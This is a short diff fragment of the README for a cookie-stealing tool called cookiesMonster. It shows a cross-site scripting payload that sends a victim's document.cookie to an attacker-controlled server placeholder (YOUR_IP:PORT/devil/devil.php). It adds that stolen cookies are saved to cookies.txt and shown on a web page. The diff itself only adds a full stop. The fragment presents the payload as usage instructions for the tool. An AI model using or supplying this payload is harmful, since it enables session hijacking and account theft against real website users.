j4f3th/cookiesMonster/README.md

 new Image().src='http://YOUR_IP:PORT/devil/devil.php?i='+document.cookie;
 ~~~

-Then you will have the cookie in the file `cookies.txt` and it will be displayed in the web page
+Then you will have the cookie in the file `cookies.txt` and it will be displayed in the web page.

 ### cleaning cookies 🗑️